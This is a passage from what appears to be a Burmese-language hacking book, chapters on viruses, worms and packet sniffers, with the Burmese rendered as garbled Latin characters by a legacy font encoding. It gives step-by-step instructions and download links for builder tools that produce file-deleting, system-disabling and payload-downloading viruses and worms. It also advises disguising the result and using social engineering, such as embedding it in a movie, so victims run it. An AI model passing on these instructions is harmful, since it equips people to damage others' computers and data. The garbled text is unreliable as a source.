CHAPTER 20: Virus and Worms

Introduction

Computer virus qdkwm target host ay:rSm execute vnf;vkyfEdkif?

replicate vnf; vkyfEdkifwJh malware trsdK;tpm;wpfckvdkY ajymvdkY&ygw,f/ virus
trsm;pkonf data file (or) executable file awGudk target xm;wwfMujyD;
tcsdKUaom virus awGuawmh target &JU boot sector udk tm&Hkpdkufwm awGY&ygw,f/
Virus awG&JU intention uawmh ul;pufcH&wJh pepfrSm xdcdkufepfemapzdkY
ygyJ/ virus awGonf data awGudk delete (or) encrypt vkyfypfwwfMuovdk OS
udkvnf; damage jzpfatmif vkyfaqmifwwfMuygw,f/ tcsdKU virus awGonf
hardware awGudkawmif ysufpD;apEdkifygw,f/ 'ghjyif virus awGonf information
awGudkyg cdk;,lwwfMuygao;w,f/
Virus awGrSm txl;pGrf;&nfawG &SdwwfMuygw,f/ 'ghjyif Anti-virus
awGu olwdkYudk &SmrawGYEdkifatmifvnf; BudK;pm;avh&SdMuygw,f/ stealth technique
(udk,faysmuf enf;ynm) vdkYyJ qdkMuygpdkY/
Virus awG[m rsm;aomtm;jzifhawmh olwdkY 0ifa&mufaerIudk
rod&SdapEdkifzdkYtwGuf legitimate software awG? data awGudk ysufpD;atmif vkyfavh
r&SdwwfMuygbl;/ program wpfckudk infect jzpfjyDqdk&if virus code awGudk xdk
w&m;0if application awG&JU tprSm xnfhoGif;vdkufMuwmrsdK;udk
vkyfaqmifygw,f/ user u program zGifhvdkufwJhtcgrSm virus code awGudkyg run
ay;ovdk jzpfoGm;atmifaygh/
Virus awGudk tcsdefumvwpfck owfrSwfay;xm;jyD; xdktcsdefumv
a&mufrSom code run atmifvnf; pDrHay;xm;Edkifygw,f/ owfrSwf&uf tcsdef
twdtusrSm xjyD; vkyfaqmifatmifaygh/ Virus awG&JU vkyfaqmifyHkonf virus udk
zefwD;vdkufol&JU pdwful;eJY qE´ay: rlwnfjyD; uGmjcm;oGm;ygw,f/
xdkodkYaom virus awGudk a&;om;EdkifzdkYtwGuf oufqdkif&m Programming
Language awGudk aumif;rGefpGm em;vnfzdkY vdktyfjyD; virus code awGudkvnf;
avhvmxm;zdkY vdktyfygw,f/ 'gayr,fh Programming Knowledge r&SdygbJvnf;
omref Virus av;awGudk zefwD;vdkY &ygao;w,f/ 'Dtcef;rSmawmh virus creation
tool awGudk toHk;jyKjyD; Virus zefwD;rIawGudk aqG;aEG;oGm;yghr,f/
b,fvdkvkyfaqmifvdkY &w,f? b,fvdk jzpfoGm;Edkifw,f qdkwmav;awGudk od&SdjyD;
b,fvdk umuG,foifhw,fqdkwm qHk;jzwfEdkifapzdkYyJ &nf&G,fwmrdkY virus awG
zefwD;jyD; tcsif;csif; aq;rxdk;MuzdkYawmh BudKwif yefMum;xm;yg&apcifAsm/
Delete Me Virus Maker (DELme)
vdktyfwJh Virus creator awGudkawmh bit.ly/virus-creators rSm
oGm;a&muf a'gif;,lEdkifygw,f/ virus maker ig;rsdK;yg&SdjyD; virus zefwD;&mrSm
toifh&SdapzdkY Virus code awG yg0ifaewmaMumifh olwdkYudk oHk;r,fqdk&ifawmh
Virtual Windows awGrSmom oHk;oifh prf;oyfoifhygw,f/ 'Dae&mrSmawmh
ig;rsdK;xJu wpfrsdK;jzpfwJh Delete Me udkom aqG;aEG;oGm;rSmjzpfygw,f/ Delete me
udk zGifhvdkuf&atmif/

pjyD; zGifhvdkufwmeJY ckvdkyHkpH jrifawGY&rSmyg/

Virus Name rSm udk,ftqifajywmay;aygh/ uRefawmfuawmh erlem

prf;jyrSmjzpfvdkY test vdkYyJ ay;xm;vdkufygw,f/ Virus Author ae&mrSm
rdrd&JU
emrnf0Suf (trSeftwdkif; rxnfhoifh) udk xnfhoGif;&ygr,f/ uRefawmfuawmh
prf;jy&HkyJrdkY kmn vdkY ay;vdkufygw,f/ tjcm; bmrS rESdyf&ao;bl;aemf/
jyD;jyDqdk&ifawmh olU&JU main option oHk;ckudk oGm;ygr,f/

Infection, Payload, Other Options qdkjyD; t"du Options oHk;ckrSm

yxrqHk; wpfck Infection u Local Infection rSm rdrd ESpfouf&mudk click vdkuf&HkeJY
b,fbufjcrf;rSm&SdwJh Black Box bufrSm program code awG ay:ygr,f/
avhvmvdkolawGvnf; uk'fawGyg MunfhEdkifwmaygh/ Local Infection rSm rdrdwdkY
OD;wnfvdkwmudk a&G;cs,fEdkifygw,f/ one click ygyJ/ (tm;vHk;awmh rvkyfygeJY/
t&rf; xdcdkufoGm;ygvdrfhr,f)/ uRefawmfuawmh tJonftydkif;av;udk bmrS
ra&G;bJ xm;cJv
h dkufygw,f/

Filetype Infection rSmawmh exe, txt, lnk, pdf, Mp3, Mp4, Doc, Xml,
Png ponfjzifh File trsdK;tpm;tvdkuf xdcdkufapvdkwJht&mudk one click vdkufyg/
tm;vHk;a&G;&ifawmh tm;vHk; ysufpD;oGm;rSmyg/

'Dtydkif;uawmh cke zdkiftrsdK;tpm;tvdkuf a&G;cs,f wdkufcdkuf&mrSm

tay:u jyxm;wJh zdkifawGxJ rygwmawG&Sd&if 'Dae&mrSm jznfhEdkifwmyg/
wpfckuae q,fckxd jznfhEdkifygw,f/ uRefawmfuawmh tay:rSm rygao;wJhxJu
jpg udk jznfhoGif;vdkufygw,f/ (rvdktyf&if bmyJjzpfjzpf ausmfcJhEdkifygw,f/
rjzpfrae xnfh&rSm r[kwfyg)
 'kwd, options u Payload yg/ tJonfae&mrSmvnf; rdrdwdkY
vdktyfwmudk click jyD; rvdkwm ausmfcJhEdkifygw,f/

'Dtqifhuawmh zsufypfwJhtqifhyg/ owdxm;oHk;oifhygw,f/ 'Dae&mrSm

Delete All .Mp3 udk click vdkuf&if uGefysLwmxJ &SdorQ Mp3 tm;vHk; ysufoGm;rSm
jzpfygw,f/ xHk;pHtwdkif; rdrd jzpfapcsifwmawGudk click jyD; rvdkwmawG
xm;cJhvdkufyg/

zsufypfapcsifwJh zdkiftrsdK;tpm;awG&Sdao;&if xyfxnfhEdkifygw,f/ Oyrm

rar, zip, ... ponfjzifhaygh/
 Delete Program uvnf;xdkYtwlygyJ/ zsufvdkwmyg&if click Edkifygw,f/
uRefawmfuawmh vHk;0 roHk;wJh IE udkyJ zsufvdkufygw,f/

atmufqHk;u Internet Options rSm Victim &JU Browser u Home Page

udk rdrdqE´&SdwJh website qD ajymif;ay;vdkufEdkifygw,f/

aemufqHk; Other Options rSmvnf; rdrdqE´eJY udkufnDwmawGudk click

Edkifygw,f/ Kill uawmh vuf&Sd oHk;aewmawGudk csufcsif; &yfwefYapEdkifwmrdkYvdkY
tcsdKU r save &ao;wJh a'wmawGudk ysufapEdkifygw,f/

uRefawmfwdkY zefwD;xm;wJh tjcm;aom Malware awGudk a'gif;apcsif&if

vnf; 'Dae&mrSm Link jznfhoGif;wmrsdK;awG vkyfaqmifEdkifygao;w,f/

uk'fawGudk jrif&wJhbuftjcrf;yg/ rdrdwdkY pdwfBudKuf jyifqifjyD;jyD

qkd&ifawmh Save As .Bat udk a&G;cs,fEdkifygjyD/ (uk'fawGudk avhvmcsif&if .Txt eJY
xkwfEdkifygw,f/) ae&ma&G; odrf;qnf;jyD;&ifawmh .Bat script av; &jyDjzpfygw,f/
'Dwdkif;oGm;ydkYay;vdkYuawmh victim u zGifhMunfhrSmawmif r[kwfavmufygbl;/ 'gudk
uRefawmfwdkYtaeeJY toGifajymif;&ygr,f/ ygq,fvSvSav; xkwfydk;jyD;oGm;&ifawmh
uRefawmfwdkY&JU Target u zGifhMunfhzdkY eD;pyfoGm;jyDaygh/ olzGifhMunfhjzpfatmifvnf;
Social Engineering udk oHk;jyD; ydkYay;Edkifovdk ol jrifatmif rodrom azmfjywmrsdK;
eJYvnf; vkyfaqmifEdkifjyDjzpfygw,f/ olu movie BudKufolqdk&if movie xJrSm
jrSKyfxnfhay;vdkuf&Hkaygh/ :)

JPS Virus Maker

aemufxyf pdwf0ifpm;p&maumif;wJh virus maker wpfckyg/
bit.ly/jps-kmn rSm a'gif;,l&&SdEdkifygw,f/ uRefawmfuawmh ckcsdefrSm latest version
jzpfwJh 3.0 udk a'gif;,ljyD; toHk;jyKaqG;aEG;oGm;ygr,f/
 JPS udk zGifhvdkufwmeJY txufygyHktwdkif; jrifawGY&rSmjzpfygw,f/ Auto
Startup wpfckudkawmh default taeeJY trSefjcpfxnfhay;xm;ygw,f/ usefwJh
function awGudkawmh tvG,fwulodEdkifr,fvdkY ,lqvdkY wpfckpD
rajymjyawmhygbl;/ tvdk&Sd&m function udk trSefjcpfay;&Hkaygh/ Name After Install
u uRefawmfwdkY zefwD;vdkufwJh Virus onf system xJ a&mufoGm;wJhtcg
jzpfay:r,fh emrnfyg/ server name rSmawmh name.exe yHkpHeJY emrnfay;Edkifygw,f/
jyD;&if tay:yHkrSm vufaxmufjyxm;wJhae&m >> udk ESdyfvdkufyg/
 uRefawmfwdkY&JU victim onf Windows XP oHk;olqdkygu XP password
udk rdrd tvdk&Sd&mtwdkif; ajymif;vJapEdkifygw,f/ computer name, IE Home Page
pwmawGudk ajymif;vJypfEdkifovdk auto yGm;wJh Worm tajctaeudkvnf; Enable
vkyfay;Edkifygao;w,f/ tm;enf;csufuawmh olYrSm icon odyfrsm;rsm;pm;pm;
r&Sdwmyg/ tm;vHk; pdwfwdkif;usjyDqdk&ifawmh Create Virus udk ESdyfvdkufwmeJY JPS
folder xJrSm exe zdkiftaeeJY xGufay:vmwmudk jrif&ygr,f/ Victim qD
a&mufzdkYawmh rdrdwdkYbmom BudK;pm;Mu&ygr,fAs/

Stealth Strategies and Infection

Virus awG[m olwdkYudk Anti-virus awGuae zrf;rd od&SdroGm;zdkYtwGuf
enf;vrf;rsm;pGmeJY BudK;pm;vkyfaqmifMuavh&Sdygw,f/ request awGudk Mum;jzwf
&,lw,f/ Anti-virus awGu Scan vkyfzdkYtwGuf OS xH request vkyf&ygw,f/
virus awG[m tqdkyg request awGudk Mum;jzwf&,lwmrsdK;eJY olwdkYtvdk&SdwJh zdkifawG?
infection version awGtwGuf return vkyfMuavh&Sdwwfygw,f/ 'gaMumifh
Anti-virus awGu tqdkyg zdkifawGGeJY ywfoufjyD; clean w,f qdkwJh answer udkom
&&SdwJhtwGuf no virus vdkYyJ jyygvdrfhr,f/ virus uawmh &SdvsufeJY
vGwfajrmufaeygvdrfhr,f/
'Dvdk virus rsdk;udk wdkufcdkufEdkifzdkYtwGuf taumif;qHk;enf;vrf;uawmh
integrity checker udk toHk;zdkYeJY OS infected file awGudk replace vkyfEdkifzdkY
jzpfygw,f/ odkYr[kwf tjcm;aom clean device wpfckckuae scan vkyfzdkY
jzpfygw,f/ uRefawmfawGYzl;orQawmh ukrÜPDtawmfrsm;rsm;onf olwdkYoHk;aewJh
uGefysLwmawGrSm virus infection awGudk owdxm;rdavhr&SdMuygbl;/ tcsdKU
organization awGrSmqdk USB stick awGudk without scan toHk;jyKaewmawmif
awGYzl;ygw,f/
tcsdKUaom virus awGonf zsufqD;zdkYvkyfaqmifMuwm &Sdayr,fh tcsdKU
virus awGuawmh zsufqD;rIrvkyfMuwmaMumifh Data damage rjzpfao;orQ
*&krpdkufwwfMuovdk infected jzpfoGm;jyDvdkY odwJhtcgrSmvnf; &Sif;xkwfzdkYxuf
Windows topfjyefwifvdkufMuwmygyJ/ wu,fwrf;awmh 'g[m aumif;wJh
vkyfaqmifcsufr[kwfygbl;/ Windows udk pirate oHk;EdkifwmaMumifh
jyefwifvdkufwm vG,fw,fqdkayr,fh bmrSrjzpfcif BudKwif owdxm;
umuG,fwmu ydkaumif;ygw,f/
uRefawmfawGYzl;wJh company tcsdKUeJY qdkiftcsdKUrSmqdk network software
awG toHk;jyKMuwm awGY&ygw,f/ server & client yHkpHeJY oHk;wmyg/ iStock vdk
ta&mif;pepfawGudkvnf; tvm;wl toHk;jyKMuygw,f/ tJ'DtajctaerSm OS &JU
security [m tvGef ta&;ygvSygw,f/ uGefysLwmeJY pm&if;awGvkyfaqmif&wm
 data damage wpfpHkwpf&mjzpfcJhygu qHk;&HI;&rIawG jzpfvmEdkifygw,f/
jzpfvdkY
Anti-virus awGu Signature vdkYac:wJh enf;pepfwpfckudk
toHk;jyKygw,f/ "Signature" qdkwJhpum;vHk;u tenf;i,fawmh vGJaeovdk
&Sdygw,f/ wu,fqdk "Search string" vdkY oHk;&if ydkjyD; oifhawmfygr,f/ 'gayr,fh
uRefawmfwdkYawGu signature vdkYyJ owfrSwfcH,lxm;MuwmrdkY 'Dwdkif;yJajym&atmif/
wu,fu virus awGrSm 'gu virus ygvdkY owfrSwf,lqEdkifwJh specific signature
awG r&SdMuygbl;/
Anti-virus u infected vdkY ,lq&wJh zdkifwpfck awGYjyDqdk&if tqdkygzdkif
onf wu,fwrf; infect jzpf rjzpfudk tjcm;enf;vrf;awGudk oHk;jyD; aocsmatmif
vkyfaqmif&ygao;w,f/ tu,fí Sequence of bytes awG
ajymif;vJoGm;w,fqdk&ifawmh 'gpm virus vdkY owfrSwfwmrsdK; vkyfaqmifygw,f/
'gayr,fh tcsdKUaom zdkifawGonf virus r[kwfMuygbl;/
virus signature awGuvnf; ul;pufcH&wmcsif; wlayr,fh
wpfzdkifeJYwpfzdkif jcm;em;Muygw,f/ Anti-virus awGu olwdkYtm;vHk;udk od&SdzdkY cufcJ
atmif vkyfaqmifMuwJhtwGuf jzpfygw,f/
detection udk a&SmifvTJEdkifzdkYtwGuf Virus awGu aemufxyf toHk;jyKwJh
enf;vrf;wpfcku encryption jzpfygw,f/ virus awGonf olwdkY&JU body udk
encrypt jyKvkyfMuygw,f/ virus onf infected file wpfckpDudk rwlnDwJh key awGeJY
encrypt vkyfwmaMumifh 'DvkyfaqmifcsufawG[m &IyfaxG;jyD; Anti-virus
awGtaeeJYvnf; decrypt rvkyfEdkifyg/ aemufwpfBudrf ppfaq;wJhtcg
xnfhoGif;ppfEdkifzdkY flag yJ vkyfEdkifygw,f/ file awGudk decrypt vkyfzdkYqdkwmu
rjzpfEdkifygbl;/ toHk;jyKxm;wJh encryption onf symmetric jzpfjyD; encryption key
onf pufxJrSm clear text taeeJY usef&SdwmaMumifh uRefawmfwdkYtaeeJY Virus
awGudkawmh decrypt & analyze vkyfEdkifygvdrfhr,f/
Virus awGeJY ywfoufjyD; tm;vHk;udk azmfjyaqG;aEG;r,fqdk&ifawmh
uRefawmfwdkYtaeeJY 'DtaMumif;t&mwpfckwnf;eJYwif pmtkyfwpftkyfpm
jzpfoGm;rSmjzpfvdkY twdkcsKyf odoifhwmav;awGudkom aqG;aEG;cJhvdkufygw,fAs/

Worms
user
&JU vkyfaqmifcsuf wpfpHkwpf&mryg0ifygbJ network ay:rSm
tvG,fwul yGm;Edkifaom software trsdK;tpm;udk worm vdkY qdkEdkifygw,f/
olwdkYawG[m 0ifa&mufcH&wJh uGefysLwmay:rSm&SdwJh a'wmawG? application awGudk
xdcdkufapjcif; vHk;0r&Sdygbl;/ 'gayr,fholY&JU resource awGudk toHk;jyKjcif;aMumifh
network udkawmh xdcdkufaprSm jzpfygw,f/
Hacker awGuawmh worm awGudk Trojan awGeJY wGJzuf toHk;jyKavh
&SdMuygw,f/ Worm awG[m weak security udk ckwHk;vkyf toHk;csavh&SdMujyD;
outdated system awGudk csdK;azmuf ul;pufapzdkY ydkrdkvG,fulygw,f/ worm &JU
tm;omcsufu jyefYyGm;vG,frI jzpfygw,f/ worm wpfckavmuf vufawGY
zefwD;MunfhMu&atmifyg/

Worm Creating
uRefawmfwdkYu Programming avhvmaeolawG r[kwfao;wmaMumifh
tool udkyJ toHk;jyKzefwD;&rSmyg/ Worm zefwD;&mrSm oabmusrdwJh tool
wpfck&Sdygw,f/ Internet Worm Maker Thing vdkY ac:wJh tool wpfckyg/
bit.ly/iwmt-kmn uae a'gif;,lEdkifygw,f/ (xHk;pHtwdkif; 'DpmtkyfxJu
application awGudk bit.ly/kmn-app rSmvnf; awGYEdkifygw,f)

zGifhMunfhvdkuf&if txufyg yHkpHtwdkif; awGYjrif&ygr,f/ Box u

us,fjyefYwJhtwGuf rdrdwdkYbmom zGifhMunfh&ifawmh ydkjyD; &Sif;vif;pGm jrif&yg
vdrfhr,f/

Worm Name rSm rdrdtqifajy&m ay;Edkifygw,f/ uRefawmfuawmh

xHk;pHtwdkif; test vdkYyJ emrnfay;vdkufygw,f/ Author ae&mrSmawmh tester vdkYyJ
xm;vdkufygw,f/ version rSm 1.0 vdkY xnfhoGif;vdkufygw,f/
Name ae&mrSm test vdkYyJ xm;vdkufygw,f

Author ae&mrSm tester

Version u 1 . 0

'Dae&mrSmawmh rdrd azmfjyvdk&m message udk

a&;Edkifygw,f

&&Sdvmr,fhzdkifudk odrf;r,fhae&m (location) aygh

'D Spreading Options uaevnf; jyefYvdkwJh

yHkpHawG a&G;Edkifygao;w,f

'Datmufbufutydkif;rSmawmh rdrdwdkY
vdktyfcsuftwdkif; trSefjcpfay;&HkygyJ

'Dae&mrSmawmh aeYpGJowfrSwfjyD;
vkyfaqmifvdku xnfhoGif;Edkifygw,f/

uRefawmfuawmh 'Dwdkif;av;yJ
csefcJhvdkufr,faemf
'Dae&mrSm trSefjcpf&if drive awG ray:awmh
Task Manager udk disable vkyfwm
Keyboard tvkyfrvkyfatmifvkyfwm
Mouse udk oHk;r&atmif vkyfwm
Message Box udk trSefjcpfxnfhjyD;
udk,fazmfjyvdk&mudk a&;Edkifygw,f/
'Dae&mrSm acgif;pOfxnfh

'Dae&mrSm azmfjycsufawGxnfh

icon a&G;

'gawGyg ydwfcsifao;&if ydwfcJhEdkifw,f

Change Reg Owner udk trSefjcpfrS

'Dae&mudk jznfhvdkY&ygr,f

'gvnf; tay:u yHkpHrsdK;ygyJ/

Home page udk rdrdajymif;oGm;apvdkaom url

qD ydkYvdkufEdkifygw,f

'D function awGxJu rdrd tqifajywm a&G;yg

uRefawmfuawmh udk,fhudk,fudk,f worm vdkY

oabmxm;jyD; udk,fhtwGuf danger awGudkyJ
z,fvdkufygw,f/ usefwmawGuawmh
&Sdygapaygh/ :)
 Open Web page udk a&G;cs,f&if
udk,fyGifhaeapcsifwJh Web page awG tvdkvdk
yGifhaeygr,f/
Internet Explorer &JU Title Bar udk
ajymif;Edkifr,fh pmom; xnfhoGif;vdkY &ygw,f

Window Media Player Txt udkvnf;

ajymif;vdku ajymif;Edkifygao;w,f/ 'Dae&mrSm
uRefawmfuawmh bmrS rvkyfjyawmhygbl;

Download File uaejyD; victim machine rSm

rdrdwdkY Run apvdkwJh software awGeJY tjcm;
malware awGudk tvdkvdk qGJatmif
vkyfaqmifay;Edkifygao;w,f/ zdkifu
wpfckxuf ydkrsm;&if More? udk ESdyfvdkufyg/

More udk ESdyfvdkufvdkY ay:vmr,fh Box rSm rdrdwdkY jznfhoGif;vdk&m other

malware (or) app awGudk direct link awG xnfhoGif;ay;Edkifygw,f/ Execute File
rSm trSefjcpfjyD; download jyD;wJhtcg install (run) atmifyg vkyfaqmifEdkifygw,f/
 'Dtydkif;awGuawmh odvG,fEdkifwmrdkY tus,f rajymawmhygbl;/
tm;vHk;jyD;wJhtcg Generate Worm udk ESdyfvdkufyg/ uRefawmfwdkY&JU Worm udk
atmifjrifpGm zefwD;jyD;pD;aMumif; azmfjyygvdrfhr,f/
 'gqdk uRefawmfwdkY odrf;xm;wJhae&mrSm oGm;Munfh&if uRefawmfwdkY
ay;xm;wJh emrnfeJY .vbs zdkif awGY&ygr,f/ trSwfwrJheJYawmh Double click eJY
oGm;rzGifhrdygapeJYAs/ udk,fhtwwfudk,fpl; qdkovdk jzpfoGm;rSmrdkYyg/
Worm awGeJY ywfoufjyD;vnf; aqG;aEG;p&mawG trsm;BuD;udk
&Sdaeygw,f/ 'gayr,fh 'Dae&mav;rSmyJ ed*Hk;csKyfyg&apcifAsm/ tao;pdwfudk
uRefawmfh&JU khitminnyo.com rSm xyfrH a&;om; azmfjyay;oGm;yghr,fcifAsm/
ckqdk virus & worm awGeJY ywfoufjyD; tenf;i,favmufawmh od&SdjyD
vdkY ,lqygw,f/ olwdkY b,fvdktvkyfvkyfw,f? olwdkYvkyfaqmifcsufawGonf
zefwD;oleJY wdkuf&dkufqufpyfaew,fqdkwmawG? b,fvdk tvG,fwul
zefwD;Edkifw,f qdkwmawG ponfjzifh uRefawmfwdkY aqG;aEG;cJhMuygw,f/
BudKwifumuG,fa&;taeeJYuawmh a&SUtcef;rSm aqG;aEG;cJhwJhyHkpHtwdkif;yJrdkY
xyfrazmfjyawmhygbl;cifAs/ 'D Chapter av;udk 'Dae&mav;rSmyJ
tqHk;owfyg&ap/
CHAPTER 21: Sniffers

Introduction

Packet Analyzer qdkwJh toHk;tEIef;rsdK;udk uRefawmfwdkY tenf;eJY

trsm;qdkovdk &if;ESD;pGm Mum;zl;Muygvdrfhr,f/ Packet Analyzer, Network
Analyzer, Protocol Analyzer, Ethernet Analyzer (or) Wireless Analyzer
ponfjzifh trsdK;rsdK;ac:a0:Muayr,fh tm;vHk;u twlwlygyJ/ Packet Analyzer
vdkYajym&if trsm;pku software wpfrsdK;tjzpfom jrifavh&SdMuygw,f/ wu,fu
Packet Analyzer onf computer program (software) wpfrsdK;vnf; jzpfEdkifovdk
digital network ay:rSm &SdaewJh jzefoef;aewJh traffic awGudk log vkyf rSwfom;Edkif?
Mum;jzwf zrf;,lEdkifwJh Hardware tpdwftydkif;uav;wpfckvnf; jzpfEdkifygw,f/
Data stream awGonf network ay: jzwfoef;oGm;wJhtwGuf sniffer
awG[m packet wpfckpDudk capture vkyf (&,l) Edkifygw,f/ vdktyfygu packet
awG&JU raw data awGudk decode yg vkyfaqmifay;Edkifygw,f/ wired broadcast
LAN awGrSmawmh hub or switch vdk network structure ay: rlwnfjyD;awmh
network xJrSm&SdaewJh single machine wpfvHk;wnf;uaejyD;awmh usef machine
tm;vHk;ay:u traffic awGudk capture &,lEdkifygw,f/
Wired broadcast eJY Wireless LAN awGrSm sniffer software running
vkyfaewJh pufudk unicast traffic awG ay;ydkYjcif;rSwyg; listening vkyfaewJh
xdkpuf&Sd&m multicast group xH multicast traffic awG ay;ydkYjyD; traffic udk
broadcast vkyfygw,f/ traffic awGudk capture vkyf&mrSm toHk;jyK&r,fh network
adapter onf promiscuous mode rSm &Sdae&ygr,f/ promiscuous mode udk
support ray;wJh adapter tcsdKU &Sdaeygw,f/ 'ghjyif wireless LAN rSm adapter
onf promiscuous mode rSm &Sdae&ifawmifrS ignore cH&rSmjzpfygw,f/ packet
awGudk awGYjrif&zdkYtwGuf adapter onf monitor mode rSm &SdaezdkY vdktyfygw,f/
Traffic udk capture jyD;wJhtcg packet &JU content wpfckvHk;udk record
vkyfxm;Edkifovdk content wpfckvHk;tpm; header udkyJvnf; record
vkyfxm;Edkifygw,f/ header udkyJ a&G;cs,fjyD; record vkyfjcif;uawmh storage
vdktyfcsufudk avsmhusapEdkifovdk legal problem udkvnf;yJ a&Smif&Sm;Edkifygw,f/
'gayr,fh problem diagnosis twGuf vdktyfwJh tcsuftvufawGudk odatmif
vkyfEdkifzdkY vHkavmufwJh data awGawmh uRefawmfwdkYrSm &Sdxm;zdkY vdktyfygvdrfhr,f/
uRefawmfwdkY toHk;jyKaeMuwJh Operating System awG
uGJjym;jcm;em;MuovdkrsdK;yJ sniffer uawGuvnf; toHk;jyK&m OS udk vdkufjyD;
uGJjym;Muygao;w,f/ sniffer awG&JU pGrf;aqmif&nfonf xkwfvkyfolawGay:
rlwnfjyD; wpfckeJYwpffck uGmjcm;Muygw,f/ a,bk,stm;jzifh sniffer awG
vkyfaqmifEdkifwmawGuawmh
❖ Analyze network problems
❖ Detect network intrusion attempts
❖ Detect network misuse by internal and external users
❖ Document regulatory compliance through logging all perimeters and end
point traffic
❖ Gain information for effecting a network intrusion
❖ Monitor WAN bandwidth utilization
❖ Monitor network usage (including internal and external users and
systems
❖ Monitor data-in-motion
❖ Monitor WAN and endpoint security status
❖ Gather and report network statistics
❖ Filter suspect content from network traffic
❖ Serve as a primary data source for day-to-day network monitoring and
management
❖ Spy on other network users and collect sensitive information, such as
login details or users
❖ Cookies (depending on any content encryption methods that may be in
use)
❖ Reverse engineer proprietary protocols used over the network
❖ Debug client/server communications
❖ Debug network protocol implementations
❖ Verify adds, moves, and changes,
❖ Verify internal control system effectiveness (firewalls, access control,
web filter, spam filter, proxy) pwmawG jzpfygw,f/
computer network administration e,fy,frSmawmh packet capture
(Pcap) rSm network traffic awGudk capture vkyfEdkifzdkYtwGuf Application
Programming Interface (API) yg0ifygw,f/ Unix-like system awGuawmh pcap
udk libpcap library rSm implement vkyfxm;jyD; Windows rSmawmh WinPcap
vdkYac:wJh libpcap port udk toHk;jyKygw,f/
Monitoring software awGu network ay: jzwfoGm;wJh Packet awGudk
capture vkyfEdkifzdkYtwGuf libpcap (or) WinPcap udk OS tvdkuf toHk;jyKygw,f/
aemufydkif; version awGrSmawmh link layer rSm&SdaewJh network ay: packet awGudk
transmit vkyfEdkifzdkY? wwfEdkiforQ network interface list awG &&SdEdkifzdkYtwGuf
libpcap & WinPcap awGudk toHk;jyKMuygw,f/

WireShark
WireShark onf network analysis tool wpfck jzpfjyD;awmh Ethereal vdkY
todrsm;Muygw,f/ olu real time rSm packet awGudkzrf;,lay;EdkifjyD;
human-readable format tjzpf azmfjyay;Edkifygw,f/ WireShark rSm filter awG?
color-coding awGeJY network xJudk ydkjyD; eufeuf&dIif;&Idif; 0ifa&mufEdkifapjyD;
individual packet awGudk inspect vkyfay;Edkifr,fh feature awG yg0ifygw,f/
WireShark onf packet awGudk capture vkyfEdkifzdkYtwGuf pcap udk
toHk;jyKxm;jyD; CNU/Linux, OS X, BSD, Solaris eJY tjcm;aom Unix-like
Operating System awGtjyif Microsoft Windows rSmyg toHk;jyKEdkifzdkY zefwD;xm;
ygw,f/ uRefawmfwdkY toHk;jyKr,fh Kali Linux rSmawmh toifh yg&SdjyD;jzpfygw,f/
WireShark rSm TShark vdkYac:wJh (GUI version r[kwfwJh) terminal-based
version wpfrsdK;vnf; &Sdygao;w,f/ Kali Linux rSm TShark vnf; yg0ifjyD;om;
jzpfygw,f/

'guawmh uRefawmf vuf&SdoHk;aewJh interface udk azmfjywmyg/

uRefawmfu ck eth0 eJY oHk;aeygw,f/ wifi r[kwfvdkY wlan0 rjyxm;ygbl;/
vufawGYawG vkyfaqmifwJhtcg ydkjyD; jrifomapvdkwJhtwGufjzpfygw,f/

WireShark zGifhvdkufwJhtcg txufygyHktwdkif; wlan0 interface udk

awGY&rSmyg/ rdrdu wifi oHk;ae&ifawmh wlan ay:ygr,f/ uJ
qufvdkuf&atmifcifAs/

WireShark zGifhvdkufwJhtcg txufygyHktwdkif; jrm;jyxm;wJhae&mu

pufoGm;yHkav;udk ESdyfMunfh&if Capture Interface ay:vmrSmjzpfjyD;awmh 'kwd,
jrm;jyxm;wJhae&mrSm Promiscuous mode udk enable vkyfxm;wm awGY&ygr,f/
tay:rSm &Sif;jycJhjyD;om;rdkY trSefjcpf rxnfh&ao;&if xnfhvdkufygcifAs/

txufygtwdkif; promiscuous mode udk enable vkyfay;jyD;jyD

qdk&ifawmh Start udk ESdyfjyD; pwifEdkifygw,f/

wifi udk toHk;jyKxm;&ifawmh txufygyHktwdkif; awGYjrif&rSmjzpfjyD;

promiscuous mode udk enable vkyfjyD;wJhtcg start Edkifovdk enable vkyfjyD;om;udk
xyfrHtoHk;jyKcsif&ifawmh Options Bar rSm&SdwJh tjyma&mif ig;ref;awmif
oauFav;udk ESdyfjyD;vnf; pwifEdkifygw,f/
 pwifjyD; cPawmh apmifh&ygr,f/ capturing pwifaewmudk jrifawGY&
ygr,f/

txufygyHktwdkif; b,f source awGuae tifwmeuf

toHk;jyKaew,fqdkwmawG? b,f device awG csdwfqufwnf&Sdaew,fqdkwmawG?
ponfjzifh rsm;pGmudk awGYjrif&rSmyg/

yHkrSmMunfh&if csdwfqufoHk;aewmawGomru source u b,fuvmw,f

qdkwmyg awGYjrif&rSmyg/ 'DerlemrSmawmh uRefawmfu Xiaomi zkef;wpfvHk;udk
toHk;jyKjyD; wifi hotspot vkyfxm;wm jzpfygw,f/ Protocol rSm TCP, UDP,
SSDP, ... pwJh used protocol awG&JU tajctaeudk awGYjrif&rSmjzpfovdk length
columd &JU nmbufudk Munfh&if info qdkwJh column rSm router &JU IP address udkyg
awGYjrif&ygr,f/

wpfckcsif;pDudk select vkyfMunfhwJhtcgrSmvnf; txufygtwdkif;

tao;pdwftajctaeawGudk awGYjrif&rSmjzpfygw,f/

txufyg vdyfpmudk Browser rSm&dkufxnfhjyD; WireShark toHk;jyKenf;

azmfjycsufawGudk oGm;a&muf zwf&IEdkifygw,f/ wiki.wireshark.org onf
wireshark toHk;jyKrIrsm;udk tao;pdwf azmfjyay;xm;aom ae&mwpfck
jzpfygw,f/ uRefawmfwdkYawGu network wpfckudk poison vkyfjyD; sniff
vkyfzdkYtwGuf promiscuous mode udk enable vkyfxm;r,fqdk&ifawmh network
ay:rSm&SdaewJh tjcm;tjcm;aom uGefysLwmawGqDu traffic awGtm;vHk;udk
uRefawmfwdkY&JU interface qD capture vkyfEdkifrSmjzpfygw,f/ wireshark onf xdkodkY
pGrf;aqmifEdkifwJh tool wpfck jzpfygw,f/

TCPdump
aemufxyf common packet analyzer wpfckuawmh TCPdump
jzpfygw,f/ command line interface tool wpfckjzpfjyD; uRefawmfwdkY uGefysLwmeJY
csdwfqufxm;wJh network ay:rSm &SdaewJh packet awGudk transmit a&m receive yg
vkyfaqmifEdkifygw,f/

Terminal rSm tcpdump odkYr[kwf tcpdump -vv udk toHk;jyKjyD;vnf;

listen vkyfEdkifygw,f/ rdrdbmom vkyfaqmifMunfh&if ydkjyD; jrifomEdkifygw,f/
